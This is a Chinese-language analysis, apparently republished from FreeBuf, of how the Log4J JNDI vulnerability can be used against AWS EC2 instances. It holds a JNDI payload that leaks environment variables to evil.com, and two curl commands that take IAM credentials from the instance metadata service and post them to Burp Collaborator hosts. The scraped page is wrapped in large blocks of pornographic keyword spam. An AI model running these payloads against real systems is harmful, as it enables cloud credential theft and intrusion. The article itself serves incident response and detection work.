精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

技術分析:Log4J JNDI 遠程執行代碼漏洞在云上環境中的獨特影響

安全 應用安全
攻擊EC2實例元數據API并不新穎,云安全研究人員也一直在描述和介紹針對這種服務的濫用行為。這不是一個“新錯誤”,而是Log4J漏洞對云計算影響的新表述。雖然這篇文章專門針對針對AWS環境的威脅,但所有相同的原則在任何GCP或Azure環境中都適用。

寫在前面的話-Log4J對云環境意味著什么?

就在不久之前,Log4J Java庫被爆出了一個關鍵安全漏洞,該漏洞一經曝光,很多安全專家和技術人員都不得不加班加點去解決這個安全漏洞所帶來的影響。Log4J JNDI漏洞與其說是單個漏洞,不如說是一個通過遠程代碼執行發起攻擊的平臺。

到目前為止,根據我們收集到的信息來看,各大廠商的安全事件響應人員、安全分析人員和技術工程師們主要都在通過以下快速響應步驟進行漏洞的緩解工作:

1、識別受影響的系統并推出發布程序;

2、迅速修復憑證安全問題;

3、尋找入侵威脅指標IoC;

那么在這篇文章中,我們將主要針對時間響應過程中的第三步步驟,即尋找入侵威脅指標IoC來進行介紹,并跟大家討論Log4J庫的潛在受攻擊風險,尤其是在公共云環境中部署時可能會遇到的安全風險。

網絡攻擊者是如何利用Log4J漏洞的?

Log4J從根本上說是一個注入漏洞,并且可以有兩種途徑來利用該漏洞對目標系統執行攻擊:

1、通過外部Java類文件實現遠程代碼執行

首先,Log4J日志記錄框架中存在注入漏洞,因此有可能引發目標服務器向遠程服務器發出HTTP請求,而此時的目標服務器則會希望從遠程服務器獲得返回的Java類文件。

其次,當攻擊者能夠控制遠程外部服務器時,他們就能夠控制響應中返回給目標服務器的內容。在這種場景下,攻擊者就可以將任意代碼嵌入在Java類文件中,然后返回給目標服務器,并在目標服務器上得到執行。

2、通過DNS查詢實現數據提取

由于Log4J中存在注入漏洞,將導致目標服務器可以向外部服務器進行出站查詢。當攻擊者能夠控制外部服務器的主機名時,就會造成環境變量值發生泄漏。

樣例如下:

${jndi:ldap://${uname}.${AWS_PROFILE}.evil.com:3489/a}

下圖顯示的是攻擊者發動Log4J JNDI攻擊的大致流程圖:

Log4J漏洞對云環境部署有何獨特影響?

根據研究人員的分析發現,如果目標系統上部署有一個易受攻擊(即存在漏洞)的Log4J庫時,攻擊者就能夠通過DNS查詢機制并利用數據提取技術來檢索目標系統上的任何環境變量值。比如說,在很多攻擊活動中,我們就發現攻擊者會利用這種技術從AWS環境中提取特定的AWS配置變量和相關數據。

但是,在環境變量中設置敏感信息很明顯是一種糟糕的做法,這種場景也不太可能發生在AWS最大的攻擊面-EC2實例上。

AWS特定的環境變量可能會設置在終端節點上,也就是終端用戶配置awscli的工作站上,或者也有可能在運行時預先配置變量“AWS_ACCESS_KEY_ID”、“AWS_SECRET_ACCESS_KEY”和“AWS_SESSION_TOKEN”的lambda函數中。

因此,AWS特定的環境變量就不太可能在EC2實例中找到了。相反,在AWS EC2實例上運行的應用程序將使用分配給EC2實例的EC2實例配置文件的臨時憑證數據。這些臨時憑證數據由稱為實例元數據服務(IMDS)的內部HTTP節點頒發。因此,我們可以使用Log4J漏洞從EC2實例中提取這些憑證數據。

使用遠程代碼執行提取實例元數據憑證

通過利用Log4J漏洞,網絡攻擊者可以嘗試從C2實例中提取臨時會話憑證,并對目標AWS資源采取進一步的攻擊行動。在下面的例子中,我們將演示Payload可能的攻擊路徑:

第一步:注入JNDI Payload,讓目標EC2查詢內部實例元數據API,并獲取EC2運行時使用的IAM角色,然后將角色名稱保存到文件中并返回給攻擊者控制的節點。

第一個發送給運行IMDSv1的EC2實例的Payload:

/bin/sh -c 'cd /tmp && curl http://169.254.169.254/latest/meta-data/iam/security-credentials >> /tmp/role && curl -d $(cat /tmp/role) http://34820348230948320948209.burpcollaborator.net'

第二步:拿到角色名稱之后,注入另一個JNDI Payload,并控制目標EC2查詢內部元數據API以獲取一個臨時會話令牌,將令牌保存為文件之后,將文件的內容返回給攻擊者控制的節點。

第二個發送給運行IMDSv1的EC2實例的Payload:

/bin/sh -c 'cd /tmp && curl http://169.254.169.254/latest/meta-data/iam/security-credentials/kat-JNDI-EC2-Role >> /tmp/token && curl -d @/tmp/token --http1.0 http://8u3xpjnhrq5nrlfmdobut3sztqzin7.burpcollaborator.net'

第三步:向目標EC2發送最后一個Payload,并控制其刪除之前兩步注入操作中創建的臨時文件。

提取的會話令牌的默認TTL為1小時。攻擊者可以利用這段時間對AWS資源采取行動,就好像它們是EC2實例一樣,甚至可能執行持久性技術,如創建新用戶或角色,具體的影響完全取決于分配給EC2實例的權限。

另一種通過Log4J提取IMDS證書的方法

從EC2實例上的實例元數據服務中提取憑據的潛在方法多種多樣,攻擊者可以利用各種Payload并通過使用HTTP查詢內部服務以檢索憑據。Payload可以通過如上所述的兩個步驟來傳遞,或者濃縮成一個步驟。可以傳遞一個Payload,讓這個Payload存儲實例元數據服務對環境變量的響應,其中環境變量的值是通過輔助JNDI注入提取的。在所有可能的變體中,唯一一致的一個步驟是必須向EC2實例上運行的實例元數據服務發出HTTP請求。

總結

攻擊EC2實例元數據API并不新穎,云安全研究人員也一直在描述和介紹針對這種服務的濫用行為。這不是一個“新錯誤”,而是Log4J漏洞對云計算影響的新表述。雖然這篇文章專門針對針對AWS環境的威脅,但所有相同的原則在任何GCP或Azure環境中都適用。

參考鏈接

https://www.vectra.ai/blog/log4j-unique-impact-in-the-cloud

本文作者:Alpha_h4ck, 轉載請注明來自FreeBuf.COM

責任編輯:武曉燕 來源: ?FreeBuf.COM?
相關推薦

2021-12-29 14:47:43

Apache團隊Log4j漏洞

2021-12-23 11:03:25

Log4j 漏洞漏洞

2021-12-10 10:26:20

Apache漏洞Log4j

2021-12-21 14:25:01

Log4j2漏洞網絡

2022-03-25 13:42:15

Log4j漏洞網絡安全

2021-12-14 23:44:26

漏洞Log4j項目

2021-12-30 11:32:54

網絡安全網絡安全技術周刊

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞

2022-01-24 10:02:53

漏洞微軟網絡攻擊

2022-03-30 11:29:53

漏洞補丁Spring

2021-12-21 10:03:24

Log4j漏洞網絡攻擊漏洞

2021-12-24 09:56:33

Log4j漏洞英偉達

2021-12-22 13:52:40

Log4j漏洞谷歌

2022-01-02 09:28:38

漏洞Log4j大數據

2021-12-24 09:52:31

Traefik Log4J 漏洞

2021-12-13 01:49:34

漏洞Log4j代碼

2021-12-14 06:59:39

Apache Log4j2 漏洞

2022-01-06 09:52:39

Log4j漏洞攻擊

2023-11-10 10:08:23

2021-12-11 19:04:38

漏洞
點贊
收藏

51CTO技術棧公眾號

黑人精品无码一区二区三区AV| 午夜一区二区视频| 头脑特工队2在线播放| 石原莉奈在线亚洲二区| www国产精品com| wwwxxxx在线观看| 亚洲精品中文字幕| 自拍偷拍国产亚洲| 蜜桃传媒一区二区| 国产女人爽到高潮a毛片| 99国产精品私拍| 久久久999成人| 国产肉体xxxx裸体784大胆| 国产成人免费精品| 五月天国产精品| 综合视频免费看| 嫩草研究院在线观看| 国产乱妇无码大片在线观看| 国产成人精品最新| 久久久久久福利| 欧美三级情趣内衣| 亚洲国产精品中文| 中文字幕在线播放一区二区| 播放一区二区| 欧美日韩一二三四五区| 中国女人做爰视频| 免费大片黄在线| 国产亚洲精品aa| 精品无码久久久久国产| 精品国产亚洲一区二区麻豆| 免费观看在线综合| 国产va免费精品高清在线观看| 五月天丁香激情| 91精品国产91久久久久久密臀 | 中文字幕永久有效| 欧美www.| 色婷婷综合久久久久中文 | 亚洲女人久久久| 欧美美乳视频| 亚洲欧洲一区二区三区在线观看| 久久性爱视频网站| 成人盗摄视频| 日韩精品一区在线观看| 免费高清视频在线观看| 99tv成人影院| 欧美一区二区三区在线观看| 亚洲综合欧美在线| 伦一区二区三区中文字幕v亚洲| 欧美日韩一区二区在线| 日韩av高清在线看片| 国产探花在线观看| 亚洲不卡一区二区三区| 日韩网站在线免费观看| av资源在线播放| 五月天婷婷综合| 国产午夜伦鲁鲁| 欧美男男tv网站在线播放| 亚洲成在线观看| 乱妇乱女熟妇熟女网站| 一区二区精品伦理...| 精品日韩中文字幕| 青青在线免费观看视频| 日本欧美不卡| 欧美日韩中文一区| 男人午夜视频在线观看| 国产高清亚洲| 精品国产一区二区三区久久影院| 少妇被狂c下部羞羞漫画| 日韩影视在线观看| 亚洲天堂第一页| 国产午夜精品久久久久久久久| 欧美色图在线播放| 久久av.com| 日本三级2019| 久久影院亚洲| 国产精品女主播| 国产剧情久久久| 成人激情黄色小说| 免费看成人片| 美女av在线播放| 一区二区三区日韩在线观看| 欧美日韩一道本| 向日葵视频成人app网址| 欧美群妇大交群中文字幕| 古装做爰无遮挡三级聊斋艳谭| www.国产精品一区| 国产亚洲精品久久久久久牛牛 | 亚洲国产精品久久不卡毛片| 一本大道熟女人妻中文字幕在线| 日韩中文视频| 精品女同一区二区| 国产精品www爽爽爽| 欧美福利影院| 国产v综合ⅴ日韩v欧美大片| 99在线精品视频免费观看软件| 99久久综合狠狠综合久久| 四虎永久国产精品| 精品一性一色一乱农村| 欧美在线|欧美| 欧美性生交xxxxx| 精品国产91| 久久久久国产视频| 这里只有精品999| 成人免费的视频| 亚洲乱码一区二区三区三上悠亚 | 日本欧美国产在线| 国产女人18毛片18精品| 国产婷婷色一区二区三区四区 | 欧美野外wwwxxx| 欧美日韩精品在线视频| 国产精品久久久久久久99| 伊人久久大香线蕉综合网站| 久久91亚洲人成电影网站 | 日韩1区2区日韩1区2区| 国产成人精品免费视频大全最热| 2019中文字幕在线视频| 黑人巨大精品欧美一区二区一视频| 最新免费av网址| 精品中文一区| 午夜美女久久久久爽久久| 国产精品-色哟哟| 国产色一区二区| 狠狠干 狠狠操| 香港久久久电影| 精品久久久999| 国产精品xxxxxx| 91免费看片在线观看| 久久福利一区二区| 国产精品日韩精品在线播放| 中文字幕欧美日韩| 国产91国语对白在线| 99国产欧美另类久久久精品| 成人av在线播放观看| 日韩欧美激情| 中文字幕日韩欧美在线| 激情网站在线观看| 久久亚洲一区二区三区四区| 日本免费a视频| 51亚洲精品| 久国内精品在线| 精品久久无码中文字幕| 亚洲欧美国产毛片在线| 亚洲综合婷婷久久| 欧美残忍xxxx极端| 国产精品影片在线观看| eeuss影院在线观看| 色综合天天综合| 在哪里可以看毛片| 三级影片在线观看欧美日韩一区二区| 精品一区久久久| 国产黄色大片在线观看| 精品奇米国产一区二区三区| 国产一级理论片| 99久久免费精品高清特色大片| 国产freexxxx性播放麻豆| 中文字幕一区二区三区四区久久| 欧美大成色www永久网站婷| 精品国产无码一区二区三区| 亚洲一区二区三区小说| 中文字幕一区二区三区乱码不卡| 亚洲激情婷婷| 欧美18视频| 中韩乱幕日产无线码一区| 中文字幕亚洲欧美日韩高清| 国产三级按摩推拿按摩| 亚洲主播在线播放| www.啪啪.com| 久久久久看片| 中文字幕一区二区三区乱码| 日本精品国产| 欧美在线性爱视频 | 中国丰满人妻videoshd| 国产亚洲欧美日韩在线观看一区二区| 国产精品美女久久久免费| 人人干在线视频| 日韩一区二区三| 国产午夜福利精品| 久久精品夜色噜噜亚洲a∨| 美女网站免费观看视频| 亚洲激情五月| 国内外成人免费视频| 欧美三区四区| www.国产精品一二区| 亚洲乱色熟女一区二区三区| 精品久久久久人成| 多男操一女视频| 国产成人av网站| 欧美三级午夜理伦三级| 视频在线不卡免费观看| 国产女人水真多18毛片18精品 | 欧美亚日韩国产aⅴ精品中极品| 日韩一卡二卡在线观看| 国产激情91久久精品导航| 欧美网站免费观看| 久久久久久久久久久久久久| 久久99久久99精品蜜柚传媒| 婷婷丁香久久| 91精品国产91久久久久久最新 | 中文字幕在线观看一区| 国产一级免费片| 久久久久久久波多野高潮日日| 熟女视频一区二区三区| 西野翔中文久久精品字幕| 91在线免费网站| 亚洲黄色中文字幕| 欧美裸身视频免费观看| 国产在线免费观看| 精品美女被调教视频大全网站| 亚洲中文字幕无码爆乳av| 亚洲激情一二三区| 免费一级特黄3大片视频| 成人福利视频网站| 天天干天天草天天| 亚洲综合欧美| 国产天堂视频在线观看| 小处雏高清一区二区三区| 欧美日韩精品免费观看视一区二区| 国产精品1区在线| 国产精品444| jizzjizz中国精品麻豆| 最近更新的2019中文字幕| 日本高清中文字幕二区在线| 日韩欧美的一区二区| 在线播放精品视频| 色欧美88888久久久久久影院| 久久精品国产av一区二区三区| 中文字幕色av一区二区三区| 成人午夜福利一区二区| eeuss影院一区二区三区 | 久久久一区二区| 亚洲一区二区三区四区av| 国产精品一区二区久久精品爱涩| 午夜免费精品视频| 丝袜诱惑制服诱惑色一区在线观看 | 丰满人妻一区二区三区免费视频| 欧美日韩另类国产亚洲欧美一级| 无码人妻精品一区二区三区蜜桃91 | 色综合久久久久久久久五月| 欧美一级二级三级视频| 风间由美久久久| 伊人精品综合| 97神马电影| 亚洲精品一区二区三区在线| 成人国产精品av| 日韩成人综合网站| 成人xxxxx| 四虎国产精品免费久久| 成人自拍性视频| 99精品国产九九国产精品| 国产啪精品视频| 一区二区三区| 亚洲一区中文字幕在线观看| 香蕉大人久久国产成人av| 91香蕉视频在线下载| 涩爱av色老久久精品偷偷鲁| 91久久偷偷做嫩草影院| av在线亚洲色图| 狠狠色狠狠色综合人人| 亚洲ab电影| 午夜精品福利一区二区| 久久麻豆精品| 男人天堂网站在线| 亚洲天堂激情| 国产精品自拍片| 日韩精品免费视频人成| 一级片视频免费观看| 国产一区欧美日韩| 秘密基地免费观看完整版中文| 9i在线看片成人免费| 蜜乳av中文字幕| 国产精品久久一级| 久草免费新视频| 欧美日韩在线免费观看| 中文字幕观看视频| 日韩色在线观看| 亚洲欧美日韩免费| 这里只有精品久久| 最新超碰在线| 91精品国产网站| 超碰这里只有精品| 国产精品国产三级国产专区53| 欧美在线关看| 亚洲人成人77777线观看| 中文字幕一区二区三三| 91精品91久久久中77777老牛| 蜜臀av性久久久久av蜜臀妖精| 日本网站在线看| 久久综合色综合88| 很污很黄的网站| 五月婷婷久久综合| 伊人免费在线观看| 精品国产露脸精彩对白| 成人av毛片| 97精品国产91久久久久久| 精品国产黄a∨片高清在线| 国产精品嫩草在线观看| 日本不卡二三区| 日韩欧美精品免费| 精品一区二区三区在线观看| 喷水视频在线观看| 亚洲三级在线播放| 国产又大又黄又粗| 日韩精品一区二区三区老鸭窝| 久久国产精品高清一区二区三区| 欧美精品一区二区免费| 免费观看成人性生生活片| 国产精品成人一区二区三区| 日本一区二区在线看| 免费成人午夜视频| 国产一区二区三区四区五区美女| 中文字幕狠狠干| 亚洲永久免费视频| 伊人久久亚洲综合| 亚洲男人第一av网站| 久草在线视频福利| 亚洲综合成人婷婷小说| 成人免费在线观看av| 无码精品a∨在线观看中文| 国产高清视频一区| 亚洲欧美另类日本| 色www精品视频在线观看| 欧美自拍偷拍一区二区| 欧美乱妇高清无乱码| 成人在线视频www| 日韩av在线电影观看| 9久re热视频在线精品| ass极品水嫩小美女ass| 国产精品伦理一区二区| 无码免费一区二区三区| 日韩精品免费视频| 91超碰在线| 国产精品国产三级国产专区53| 亚洲一级毛片| www.久久av.com| 国产精品理论片在线观看| 在线视频 91| 国产亚洲视频在线| japanese23hdxxxx日韩| 免费在线成人av电影| 免费日韩精品中文字幕视频在线| 北京富婆泄欲对白| 五月天激情综合| 天堂а√在线8种子蜜桃视频 | 日韩高清欧美高清| 老色鬼在线视频| 久久精品综合一区| 午夜在线一区| 成都免费高清电影| 91久久一区二区| yourporn在线观看中文站| 国产精品av在线| 日本女优一区| 在线观看免费不卡av| 自拍偷自拍亚洲精品播放| 国产理论视频在线观看| 欧美成人三级视频网站| 亚洲福利合集| 人人干视频在线| 91理论电影在线观看| 亚洲天堂五月天| 中文字幕亚洲在线| 国色天香久久精品国产一区| 成人短视频在线观看免费| 成人永久aaa| 日本在线播放视频| 在线日韩av观看| 欧美国产中文高清| 青青青在线视频播放| xnxx国产精品| 亚洲天堂手机在线| 欧美日本亚洲视频| 国产香蕉精品| 国产精品涩涩涩视频网站| 中文字幕一区二区在线观看| 国产女人高潮时对白| 97精品久久久中文字幕免费| 欧美日本成人| 国产91在线免费观看| 图片区日韩欧美亚洲| av电影在线网| 粉嫩高清一区二区三区精品视频 | 最近中文字幕一区二区三区| 亚洲精品国产av| 人体精品一二三区| 99久久精品国产亚洲精品| 秘密基地免费观看完整版中文 | 91精品国自产| 午夜精品一区二区三区av| 日韩成人精品一区二区| avtt中文字幕| 色婷婷一区二区三区四区| 国产在线看片| 欧美日韩国产精品一区二区| 国产一区二区在线观看视频| 国偷自拍第113页| 欧美成人性色生活仑片| 九九热精品视频在线观看| 两女双腿交缠激烈磨豆腐| 日韩欧美在线观看| 四虎影视国产在线视频|